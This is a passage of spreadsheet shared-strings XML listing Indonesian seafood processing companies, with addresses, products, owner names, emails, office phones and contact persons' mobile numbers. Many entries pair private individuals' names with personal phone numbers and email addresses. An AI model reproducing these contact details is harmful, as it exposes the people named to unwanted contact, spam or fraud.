    <t>Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Beku, Lainnya</t>
  </si>
  <si>
    <t>Teri Beku, Daging Rajungan Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Udang Beku, Tuna Beku, Capit dan Cangkang Rajungan Rebus Beku, Daging Rajungan Pasteurisasi, Kerang Beku</t>
  </si>
  <si>
    <t>Frangky Onggabean</t>
  </si>
  <si>
    <t>Kragan</t>
  </si>
  <si>
    <t>Sumber Sari</t>
  </si>
  <si>
    <t>ptsmb17@gmail.com</t>
  </si>
  <si>
    <t>Frangky Onggabean 0816651687, 081318759295</t>
  </si>
  <si>
    <t>PT. AGARINDO BOGATAMA</t>
  </si>
  <si>
    <t>Banten</t>
  </si>
  <si>
    <t>Jl. Raya Pasar Kemis Km 6, Kel. Sukamantri, Kec. Pasar Kemis, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Reduksi</t>
  </si>
  <si>
    <t>Tepung Agar-agar</t>
  </si>
  <si>
    <t>Efendy Tjoeng</t>
  </si>
  <si>
    <t>Pasar Kemis</t>
  </si>
  <si>
    <t>Sukamantri</t>
  </si>
  <si>
    <t>dcr.agarindobogatama@gmail.com</t>
  </si>
  <si>
    <t>021-5903517, 021-5903512</t>
  </si>
  <si>
    <t>Ina Nurlaeni, Ajeng 08816179901</t>
  </si>
  <si>
    <t>Anthonio</t>
  </si>
  <si>
    <t>PT. CITRA DIMENSI ARTHALI</t>
  </si>
  <si>
    <t>Perum Prasarana Perikanan Samudera Blok N No.11, Jl. Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Beku</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>EDDY SURYA</t>
  </si>
  <si>
    <t>qa@cedeaseafood.com</t>
  </si>
  <si>
    <t>021-6602092</t>
  </si>
  <si>
    <t>Iska Sri Darmah 085692444660</t>
  </si>
  <si>
    <t>ISKA SRI DARMAH</t>
  </si>
  <si>
    <t>PT. AWINDO INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.7 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku</t>
  </si>
  <si>
    <t>RUSTAM</t>
  </si>
  <si>
    <t>rika@awindointernational.com</t>
  </si>
  <si>
    <t>021-29623333, 021-29625972, 021-6623264</t>
  </si>
  <si>
    <t>Sofia Athohiro/April 083879539133</t>
  </si>
  <si>
    <t>PT. FISHNESIA MITRA BERSAMA</t>
  </si>
  <si>
    <t>Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III No.75 RT 04 RW 05, Kel. Rungkut Tengah, Kec. Gununganyar, Kota Surabaya</t>
  </si>
  <si>
    <t>Bandeng Beku Untuk Umpan</t>
  </si>
  <si>
    <t>SAPTA CUBIANTORO</t>
  </si>
  <si>
    <t>Gununganyar</t>
  </si>
  <si>
    <t>Rungkut Tengah</t>
  </si>
  <si>
    <t>sapta.fishnesia@gmail.com</t>
  </si>
  <si>
    <t>031-3977504, 031-8437449</t>
  </si>
  <si>
    <t>Novi Mega Lestari 085816773389</t>
  </si>
  <si>
    <t xml:space="preserve"> MUNAWAR</t>
  </si>
  <si>
    <t>PT. MASUYA GRAHA TRIKENCANA</t>
  </si>
  <si>
    <t>Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Cempaka No.12 Blok F-I, Kel. Jatimulya, Kec. Tambun Selatan, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Segar, Beku, Lainnya, Kaleng</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Kerang Beku, Fillet Salmon Segar, Cephalopoda Segar, Cephalopoda Beku, Telur Ikan Segar, Hati Ikan Segar, Telur Ikan Beku, Hati Ikan Baku, Nori, Tuna Segar, Tuna Beku, Udang Segar, Kepiting Segar, Udang Beku, Kepiting Beku,, Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Fillet Salmon Beku, Kerang Segar</t>
  </si>
  <si>
    <t>PINNYWATI CHANDRA</t>
  </si>
  <si>
    <t>Tambun Selatan</t>
  </si>
  <si>
    <t>Jatimulya</t>
  </si>
  <si>
    <t>imporadmin3@masuyagraha.com</t>
  </si>
  <si>
    <t>021-88353665</t>
  </si>
  <si>
    <t>HONGKI LUKMAN SARDI 081586420640</t>
  </si>
  <si>
    <t>HONGKI LUKMAN SARDI</t>
  </si>
  <si>
    <t>Gudang Beku Dalam Negeri</t>
  </si>
  <si>
    <t>PT. MARINA JAYA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok N1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>JENSEN FENDY</t>
  </si>
  <si>
    <t>marina@yahoo.com</t>
  </si>
  <si>
    <t>HANSON 08221</t>
  </si>
  <si>
    <t>HANSON</t>
  </si>
  <si>
    <t>Gudang Beku Export</t>
  </si>
  <si>
    <t>PT. SAMUDERA INDO SEJAHTERA</t>
  </si>
  <si>
    <t>Maluku</t>
  </si>
  <si>
    <t>Jl. Dullah Raya Km 8, Kel. Ngadi, Kec. Pulau Dullah Utara, Kota Tual</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Loin Beku</t>
  </si>
  <si>
    <t>RONNY LEONARD HAMID DIANA ANDI</t>
  </si>
  <si>
    <t>Pulau Dullah Utara</t>
  </si>
  <si>
    <t>Ngadi</t>
  </si>
  <si>
    <t>sis.tual.sekre@gmail.com</t>
  </si>
  <si>
    <t>Mawaddah Renhoran 082111381444</t>
  </si>
  <si>
    <t>GLEN TUPAMAHU</t>
  </si>
  <si>
    <t>UD. NAGATA TUNA</t>
  </si>
  <si>
    <t>Aceh</t>
  </si>
  <si>
    <t>Jl. Cot Aron 2 No.2, Kel. Punge Blang Cut, Kec. Jaya Baru, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Udang Segar, Ikan Demesal Beku, Ikan Demersal Segar, Ikan Pelagis Segar, Gurita Beku, Fillet Ikan Beku</t>
  </si>
  <si>
    <t>MUSLIM</t>
  </si>
  <si>
    <t>Jaya Baru</t>
  </si>
  <si>
    <t>Punge Blang Cut</t>
  </si>
  <si>
    <t>ud.nagatatuna@yahoo.co.id</t>
  </si>
  <si>
    <t>PT. SHINMAS JAYA BAHARI</t>
  </si>
  <si>
    <t>Jl. Margomulyo No.44 Komplek Suri Mulia Blok H-17, Kel. Asemrowo, Kec. Tambak Sari Oso, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Air Tawar Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>MARTONO</t>
  </si>
  <si>
    <t>Tambak Sari Oso</t>
  </si>
  <si>
    <t>Asemrowo</t>
  </si>
  <si>
    <t>shinmas@gmail.com</t>
  </si>
  <si>
    <t>Viky 08113030333</t>
  </si>
  <si>
    <t>PT. BELITUNG BERKAH MANDIRI</t>
  </si>
  <si>
    <t>Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Tanjung Pandan, Jl. RE. Martadinata RT 007 RW 004, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Udang Kipas Beku, Rajungan Beku, Siput Beku</t>
  </si>
  <si>
    <t>SUGITO</t>
  </si>
  <si>
    <t>Tanjungpandan</t>
  </si>
  <si>
    <t>Kota</t>
  </si>
  <si>
    <t>belitungberkahmandiri@yahoo.com</t>
  </si>
  <si>
    <t>JONSON 087797112270</t>
  </si>
  <si>
    <t>CITRA RASA</t>
  </si>
  <si>
    <t>Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Klaci II RT 004 RW 011, Kel. Margoluwih, Kec. Seyegan, Kabupaten Sleman</t>
  </si>
  <si>
    <t>Keripik Belut, Keripik Wader</t>
  </si>
  <si>
    <t>Wartiyem</t>
  </si>
  <si>
    <t>Seyegan</t>
  </si>
  <si>
    <t>Margoluwih</t>
  </si>
  <si>
    <t>wartiyemcitrarasa@gmail.com</t>
  </si>
  <si>
    <t>Wartiyem 081328002423</t>
  </si>
  <si>
    <t>Sriyanto</t>
  </si>
  <si>
    <t>PT. ZHANG MARINA INDONESIA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Hiu Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Hendri Effendi</t>
  </si>
  <si>
    <t>zmi.document@gmail.com</t>
  </si>
  <si>
    <t>021-66678682</t>
  </si>
  <si>
    <t>Maulidan 081281643758</t>
  </si>
  <si>
    <t>PT. MORENZO ABADI PERKASA</t>
  </si>
  <si>
    <t>Jl. Raya Demak-Kudus Km 10 RT 002 RW 003, Kel. Gajah, Kec. Gajah, Kabupaten Demak</t>
  </si>
  <si>
    <t>Beku, Kaleng</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Udang Beku, Daging Rajungan Pasteurisasi Kaleng</t>
  </si>
  <si>
    <t>Markus Silitonga</t>
  </si>
  <si>
    <t>Gajah</t>
  </si>
  <si>
    <t>morenzodemak@gmail.com</t>
  </si>
  <si>
    <t>0291-6910185</t>
  </si>
  <si>
    <t>PT. ALAMSEGAR JAYA</t>
  </si>
  <si>
    <t>Jl. Kosambi Perancis Permai Blok L No.15, 15A, 16, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Udang Beku</t>
  </si>
  <si>
    <t>KAMIL</t>
  </si>
  <si>
    <t>Kosambi</t>
  </si>
  <si>
    <t>Dadap</t>
  </si>
  <si>
    <t>diandwi64@yahoo.com</t>
  </si>
  <si>
    <t>(62-21) 66696531</t>
  </si>
  <si>
    <t>ROBERT KAMIL / 0811945812</t>
  </si>
  <si>
    <t>ROBERT KAMIL</t>
  </si>
  <si>
    <t>PT. BANDAR JAYA SENTOSA</t>
  </si>
  <si>
    <t>Komplek Pergudangan Kosambi Permai Blok KK16 - KK17, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demesal Beku, Udang Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>djayanti941@yahoo.com</t>
  </si>
  <si>
    <t>ROBIN KAMIL / 08111984596</t>
  </si>
  <si>
    <t>ROBIN KAMIL</t>
  </si>
  <si>
    <t>PT. KELOLA BIRU HARMONI</t>
  </si>
  <si>
    <t>Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Lobster Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Cephalopoda Beku, Gurita Rebus Beku, Bandeng Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>Ariyo Ali Suprapto</t>
  </si>
  <si>
    <t>Tanjung Priok</t>
  </si>
  <si>
    <t>marni.qc@gmail.com</t>
  </si>
  <si>
    <t>021-4301001</t>
  </si>
  <si>
    <t>Sumarni 081235678004</t>
  </si>
  <si>
    <t>PT. SEKAR SEINAN FOOD</t>
  </si>
  <si>
    <t>Jl. Millenium Raya Blok L1 No.1 Kawasan Industri Millenium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Lumatan Daging</t>
  </si>
  <si>
    <t>Sosis Ikan</t>
  </si>
  <si>
    <t>Oei Harry Lukmito</t>
  </si>
  <si>
    <t>Panongan</t>
  </si>
  <si>
    <t>Peusar</t>
  </si>
  <si>
    <t>saepudin@sekarseinan.com</t>
  </si>
  <si>
    <t>021-59981515</t>
  </si>
  <si>
    <t>Saepudin/08128207228</t>
  </si>
  <si>
    <t>Hartono Wijaya</t>
  </si>
  <si>
    <t>PT. COLDSTORINDO JAYA PERKASA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok Heritage Mercusuar Kav 3 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>DESRIYANTO SUMARDI</t>
  </si>
  <si>
    <t>coldstorindo01@yahoo.com</t>
  </si>
  <si>
    <t>...pilih omzet tahunan...</t>
  </si>
  <si>
    <t>TARSILAN DAN 085645768448</t>
  </si>
  <si>
    <t>tarsilan</t>
  </si>
  <si>
    <t>PT. CHARLY WIJAYA TUNA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung, Pelabuhan Muara Baru Blok K.7C, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku Untuk Umpan</t>
  </si>
  <si>
    <t xml:space="preserve">JEMMY WIJAYA </t>
  </si>
  <si>
    <t>msufangat@gmail.com</t>
  </si>
  <si>
    <t>JEMMY WIJAYA (085881112717)</t>
  </si>
  <si>
    <t>JEMMY WIJAYA</t>
  </si>
  <si>
    <t>PT. BAHARI PRIMA MANUNGGAL</t>
  </si>
  <si>
    <t>Jl. Bakti Mulya 2 No.58, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Segar, Beku</t>
  </si>
  <si>
    <t>Kerang Segar, Kerang Beku, Ikan Hasil Budidaya Segar, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>WAHYU</t>
  </si>
  <si>
    <t>Kalideres</t>
  </si>
  <si>
    <t>Tegal Alur</t>
  </si>
  <si>
    <t>bahariprimamanunggal@gmail.com</t>
  </si>
  <si>
    <t>WAHYU &amp; 085774038518</t>
  </si>
  <si>
    <t>PT. BANYUWANGI CANNERY INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Situbondo Km 12,5, Kel. Ketapang, Kec. Kalipuro, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Tuna Masak Beku, Tuna Kaleng, Sarden Kaleng</t>
  </si>
  <si>
    <t>RANDY WIJAYA</t>
  </si>
  <si>
    <t>Kalipuro</t>
  </si>
  <si>
    <t>Ketapang</t>
  </si>
  <si>
    <t>qc.bci_banyuwangi@yahoo.com</t>
  </si>
  <si>
    <t>0333-510039</t>
  </si>
  <si>
    <t>ENGKUSNADI 082143047881</t>
  </si>
  <si>
    <t>ENGKUSNADI</t>
  </si>
  <si>
    <t>CV. ANUGRAH BINTANG CEMERLANG</t>
  </si>
  <si>
    <t>Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Bambu Runcing No.99, Kel. Pettuadae, Kec. Turikale, Kabupaten Maros</t>
  </si>
  <si>
    <t>Bandeng Beku, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>H. Haerul Muhammad</t>
  </si>
  <si>
    <t>Turikale</t>
  </si>
  <si>
    <t>Pettuadae</t>
  </si>
  <si>
    <t>abcmaros@gmail.com</t>
  </si>
  <si>
    <t>0411-3882200</t>
  </si>
  <si>
    <t xml:space="preserve">H. Haerul Muhammad </t>
  </si>
  <si>
    <t>PT. CHEN WOO FISHERY</t>
  </si>
  <si>
    <t>Jl. Kima 4 Kav K-9 Blok B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Tuna Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Segar, Ikan Demersal Beku, Tuna Beku</t>
  </si>
  <si>
    <t>FERRY GUNAWAN</t>
  </si>
  <si>
    <t>Biringkanaya</t>
  </si>
  <si>
    <t>Daya</t>
  </si>
  <si>
    <t>eya_cwf@yahoo.com</t>
  </si>
  <si>
    <t xml:space="preserve">FERAYANI GAPUR </t>
  </si>
  <si>
    <t>PT. CAHAYA BINTANG LAUT ABADI</t>
  </si>
  <si>
    <t>Jl. Laksamana Malahayati, Kel. Temberan, Kec. Bukit Intan, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Udang Kipas Beku, Udang Kipas Segar, Rajungan Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Segar, Ikan Demersal Segar, Rajungan Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Johan Daniel</t>
  </si>
  <si>
    <t>Bukit Intan</t>
  </si>
  <si>
    <t>Temberan</t>
  </si>
  <si>
    <t>lhiyancz@gmail.com</t>
  </si>
  <si>
    <t>0717-433471</t>
  </si>
  <si>
    <t>Johan Daniel, Hanasia 082299904892</t>
  </si>
  <si>
    <t>PT. CENTRALPERTIWI BAHARI</t>
  </si>
  <si>
    <t>Kampung Adiwarna, Kel. Kampung Adiwarna, Kec. Gedung Meneng, Kabupaten Tulangbawang</t>
  </si>
  <si>
    <t>Udang Bernilai Tambah Beku, Ikan Bernilai Tambah Beku, Udang Rebus Beku, Udang Mentah Beku, Seafood Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>BENJAMIN DJIARAVANON</t>
  </si>
  <si>
    <t>Gedung Meneng</t>
  </si>
  <si>
    <t>Kampung Adiwarna</t>
  </si>
  <si>
    <t>giarsih.spafpd@cpp.co.id</t>
  </si>
  <si>
    <t>0725 556083</t>
  </si>
  <si>
    <t>ARIEF KUNTARTO HADI 08975777609</t>
  </si>
  <si>
    <t>ARIANTO YOHAN</t>
  </si>
  <si>
    <t>PT. MANDIRI SUKSES JAYA PERKASA</t>
  </si>
  <si>
    <t>Jl. Pusat Pemasaran Ikan No.74,75,76 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Bandeng Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>SIOW WILI</t>
  </si>
  <si>
    <t>mitrasuksesjaya@ymail.com</t>
  </si>
  <si>
    <t>021 6670065</t>
  </si>
  <si>
    <t>SIOW WILI 0821888883</t>
  </si>
  <si>
    <t>PT. HALINDO LAUTAN INDONESIA</t>
  </si>
  <si>
    <t>Pergudangan Gading Mutiara Permai Blok G-11, Kel. Kepatihan, Kec. Menganti, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Kering</t>
  </si>
  <si>
    <t>Rumput Laut Kering</t>
  </si>
  <si>
    <t>Halim Wibowo Loo</t>
  </si>
  <si>
    <t>Menganti</t>
  </si>
  <si>
    <t>Kepatihan</t>
  </si>
  <si>
    <t>halindo.indonesia@yahoo.co.id</t>
  </si>
  <si>
    <t>031-99019178</t>
  </si>
  <si>
    <t>Halim Wibowo Loo 08113438168</t>
  </si>
  <si>
    <t>UPRLK (Unit Penanganan Rumput Laut Kering)</t>
  </si>
  <si>
    <t>PT. FKS MULTI AGRO TBK</t>
  </si>
  <si>
    <t>Jl. Kalimati No.36, Dusun Stoplas, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Reduksi, Beku</t>
  </si>
  <si>
    <t>Tepung Ikan, Minyak Ikan, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>PO Indarto Gondo</t>
  </si>
  <si>
    <t>Muncar</t>
  </si>
  <si>
    <t>Kedungrejo</t>
  </si>
  <si>
    <t>nunuk.ariyani@fksmultiagro.co.id</t>
  </si>
  <si>
    <t>0333-593515</t>
  </si>
  <si>
    <t>Wulandriyanto (0811364458)</t>
  </si>
  <si>
    <t>Wulandriyanto</t>
  </si>
  <si>
    <t>CV. KUDATAMA MAS</t>
  </si>
  <si>
    <t>Jl. KIG Raya Barat Kav G-2, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi</t>
  </si>
  <si>
    <t>GUNAWAN TJOA</t>
  </si>
  <si>
    <t>Kebomas</t>
  </si>
  <si>
    <t>Randuagung</t>
  </si>
  <si>
    <t>farida.kudatamamas@gmail.com</t>
  </si>
  <si>
    <t>031-3989293, 031-3991546</t>
  </si>
  <si>
    <t>FARIDA NURSANTI 085646565442</t>
  </si>
  <si>
    <t>PT. JASPO INTERNASIONAL PRATAMA</t>
  </si>
  <si>
    <t>Jl. Kapuk Kamal Muara VII No.73 (Room 5), Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Salmon Beku, Daging Tuna Beku, Kerang Beku</t>
  </si>
  <si>
    <t xml:space="preserve">benny </t>
  </si>
  <si>
    <t xml:space="preserve">Penjaringan </t>
  </si>
  <si>
    <t xml:space="preserve">Kamal Muara </t>
  </si>
  <si>
    <t>hendrywankusuma@rocketmail.com</t>
  </si>
  <si>
    <t>REY ANDRIAN 082176860570</t>
  </si>
  <si>
    <t>benny</t>
  </si>
  <si>
    <t>CV. GEMA ANDIKA PRATAMA</t>
  </si>
  <si>
    <t>Pergudangan 88, Jl. Pesing Poglar No.76A RT 004 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>ANDI SUSANTO</t>
  </si>
  <si>
    <t>Cengkareng</t>
  </si>
  <si>
    <t>Kedaung Kaliangke</t>
  </si>
  <si>
    <t>gap_jkt@yahoo.co.id</t>
  </si>
  <si>
    <t>021-66696450, 021-56942630, 021-56973948</t>
  </si>
  <si>
    <t>Juniman 081195120</t>
  </si>
  <si>
    <t>PT. HASIL ALAM TANI NELAYAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Hatni No.200 Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Beku, Kering</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Asin Beku</t>
  </si>
  <si>
    <t>ERLIN SUTIOSO</t>
  </si>
  <si>
    <t>Paciran</t>
  </si>
  <si>
    <t>Tlogosadang</t>
  </si>
  <si>
    <t>ulien.nuhaa25@gmail.com</t>
  </si>
  <si>
    <t>031-3942049, 031-3949755</t>
  </si>
  <si>
    <t>IMAM MUJIB 085330646064</t>
  </si>
  <si>
    <t>IMAM MUJIB</t>
  </si>
  <si>
    <t>PT. SUKSES LAUTAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku, Kerang Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku, Tuna Beku, Fillet Ikan Beku, Udang Beku</t>
  </si>
  <si>
    <t>DRS. ROY A. PRASETYO</t>
  </si>
  <si>
    <t>Mayangan</t>
  </si>
  <si>
    <t>sulindopbl@gmail.com</t>
  </si>
  <si>
    <t>0335-426666</t>
  </si>
  <si>
    <t>RENGGA  PERMANA/Roy 0816509887</t>
  </si>
  <si>
    <t>ABDUL ROHIM</t>
  </si>
  <si>
    <t>PT. LANGKAT LAUT TIMUR</t>
  </si>
  <si>
    <t>Jl. Pangkalan Brandan No.143, Kel. Beras Basah, Kec. Pangkalan Susu, Kabupaten Langkat</t>
  </si>
  <si>
    <t>Udang Beku, Kepiting Kulit Lunak Beku</t>
  </si>
  <si>
    <t>Budy Hartono</t>
  </si>
  <si>
    <t>Pangkalan Susu</t>
  </si>
  <si>
    <t>Beras Basah</t>
  </si>
  <si>
    <t>budy388@yahoo.com</t>
  </si>
  <si>
    <t>Andi 0811639290</t>
  </si>
  <si>
    <t>Andi</t>
  </si>
  <si>
    <t>PT. HALINDO BERJAYA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Burhanuddin LK II, Kel. Perjuangan, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Udang Beku</t>
  </si>
  <si>
    <t>TIONG KIAN</t>
  </si>
  <si>
    <t>Teluk Nibung</t>
  </si>
  <si>
    <t>Perjuangan</t>
  </si>
  <si>
    <t>kian.king27@yahoo.com</t>
  </si>
  <si>
    <t>0623-597066</t>
  </si>
  <si>
    <t>Shintaria Angelina 085359105775</t>
  </si>
  <si>
    <t>Shintaria angelina</t>
  </si>
  <si>
    <t>SIDIQ RIZAL</t>
  </si>
  <si>
    <t>Pundung Pedukuhan V RT 017 RW 009, Kel. Banaran, Kec. Galur, Kabupaten Kulon Progo</t>
  </si>
  <si>
    <t>Wader Crispy</t>
  </si>
  <si>
    <t>Wakijah</t>
  </si>
  <si>
    <t>Galur</t>
  </si>
  <si>
    <t>Banaran</t>
  </si>
  <si>
    <t>dita.05678@gmail.com</t>
  </si>
  <si>
    <t>Sarmuji</t>
  </si>
  <si>
    <t>PT. FININDO BATAM</t>
  </si>
  <si>
    <t>Kepulauan Riau</t>
  </si>
  <si>
    <t>Komplek Harbour View Blok A No.07, Kel. Sungai Jodoh, Kec. Batu Ampar, Kota Batam</t>
  </si>
  <si>
    <t>Perut Ikan Kering, Teripang Kering, Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Sirip Hiu Beku, Kulit Hiu Beku, Tulang Hiu Beku</t>
  </si>
  <si>
    <t>HUI PENG</t>
  </si>
  <si>
    <t>Batu Ampar</t>
  </si>
  <si>
    <t>Sungai Jodoh</t>
  </si>
  <si>
    <t>finindo_batam@yahoo.com</t>
  </si>
  <si>
    <t>0778-458130, 0778-458129</t>
  </si>
  <si>
    <t>Johni 08566668103</t>
  </si>
  <si>
    <t>PT. TOBA SURIMI INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Lobster Air Tawar Beku, Ikan Demersal Beku, Cephalopoda Rebus Beku, Tuna Loin Masak Beku, Kepiting Lunak Beku, Daging Kepiting Isi Beku, Daging Kepiting Rebus Beku</t>
  </si>
  <si>
    <t>Gindra Tardy</t>
  </si>
  <si>
    <t>Percut Sei Tuan</t>
  </si>
  <si>
    <t>Saentis</t>
  </si>
  <si>
    <t>gindra@nusa.net.id</t>
  </si>
  <si>
    <t>061-6871022</t>
  </si>
  <si>
    <t>Sri Handayani 081361553933, Simon 081398090892</t>
  </si>
  <si>
    <t>PT. ROHTADI</t>
  </si>
  <si>
    <t>Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Tikala Kumaraka Lingkungan III No.23, Kel. Tikala Kumaraka, Kec. Tikala, Kota Manado</t>
  </si>
  <si>
    <t>Kering, Segar</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Tuna Segar</t>
  </si>
  <si>
    <t>ROY TAMO</t>
  </si>
  <si>
    <t>Bunaken</t>
  </si>
  <si>
    <t>Bailang</t>
  </si>
  <si>
    <t>mariaketty_dgs@yahoo.com</t>
  </si>
  <si>
    <t>MARIA GOGANI 085343955622</t>
  </si>
  <si>
    <t>PT. MARINDO MAKMUR USAHA JAYA</t>
  </si>
  <si>
    <t>Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Makarel Beku, Cephalopoda Beku, Tuna Beku, Ikan Scombroid Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Capelin Kering Beku, Ikan Hasil Budidaya Beku, Ikan Asin Kering, Fillet Ikan Segar, Tuna Loin Segar</t>
  </si>
  <si>
    <t>H. M. Najich/ M. Novi Saputro</t>
  </si>
  <si>
    <t>Gedangan</t>
  </si>
  <si>
    <t>mmu@mmuseafood.com</t>
  </si>
  <si>
    <t>Fardilah 08123121342</t>
  </si>
  <si>
    <t>Khusnul Habibi</t>
  </si>
  <si>
    <t>PT. ANUGERAH KERAMAT INDAH</t>
  </si>
  <si>
    <t>Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Cephalopoda Beku, Siput Beku, Kerang Beku, Cacing Laut Beku</t>
  </si>
  <si>
    <t>IRWAN</t>
  </si>
  <si>
    <t>Sei Merbau</t>
  </si>
  <si>
    <t>anugrahkeramatindah@gmail.com</t>
  </si>
  <si>
    <t>0623-94783</t>
  </si>
  <si>
    <t>irwan 0811629436</t>
  </si>
  <si>
    <t>PT. WINDUBLAMBANGAN SEJATI</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku, Cephalopoda Mentah Beku, Cephalopoda Rebus Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Scombroid Beku, Campuran Seafood Beku</t>
  </si>
  <si>
